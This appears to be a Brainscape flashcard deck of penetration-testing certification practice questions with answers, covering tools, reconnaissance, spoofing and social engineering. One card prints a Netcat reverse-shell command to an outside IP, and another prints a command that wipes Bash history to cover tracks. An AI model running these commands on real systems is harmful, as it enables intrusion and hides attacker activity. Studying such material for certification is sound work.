Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Pentest Cert > 1 > Flashcards

1 Flashcards

1
Q

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross-site scripting

A

B. VM escape

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?
A. An SOW
B. An NDA
C. An MSA
D. A noncompete

A

B. An NDA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
A. ZAP
B. Nessus
C. SonarQube
D. OllyDbg

A

A. ZAP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?
A. PowerShell
B. Bash
C. Ruby
D. Python

A

B. Bash

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee’s scope of work is limited to penetration testing.

A

C. Report the potential compromise to the client.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
A. Black box
B. Authenticated
C. Internal view
D. External view

A

B. Authenticated

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
A. history -c
B. kill -9 $$
C. echo “” ˃ /~/.bash_history
D. ln /dev/null ~/.bash_history -sf

A

D. ln /dev/null ~/.bash_history -sf

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
A. Nmap
B. Nikto
C. Wireshark
D. CeWL

A

B. Nikto

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
A. OSINT
B. HSI
C. Background
D. None of the above

A

A. OSINT

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Which of the following activities constitutes a violation of integrity?
A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

A

B. Sensitive or proprietary information was changed or deleted.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

A. 256
B. 1,000
C. 1,024
D. 65,535

A

B. 1,000

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting

A

D. Threat hunting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above

A

A. Started a reverse shell using Netcat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing

A

C. Double tagging

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Alaina wants to conduct an on-path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?
A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering

A

A. ARP spoofing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?
A. Authority
B. Scarcity
C. Likeness
D. Social proof

A

D. Social proof

17
Q

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on-site via the network?
A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo

A

C. USB key drop

18
Q

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file

A

C. A SUID file

19
Q

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?
A. Nmap
B. Traceroute
C. regmon
D. Whois

A

D. Whois

20
Q

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?
A. Run system-detect-virt.
B. Run ls -l /dev/disk/by-id.
C. Run wmic baseboard to get manufacturer, product.
D. Run dmidecode to retrieve hardware information.

A

C. Run wmic baseboard to get manufacturer, product.

Pentest Cert (1 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions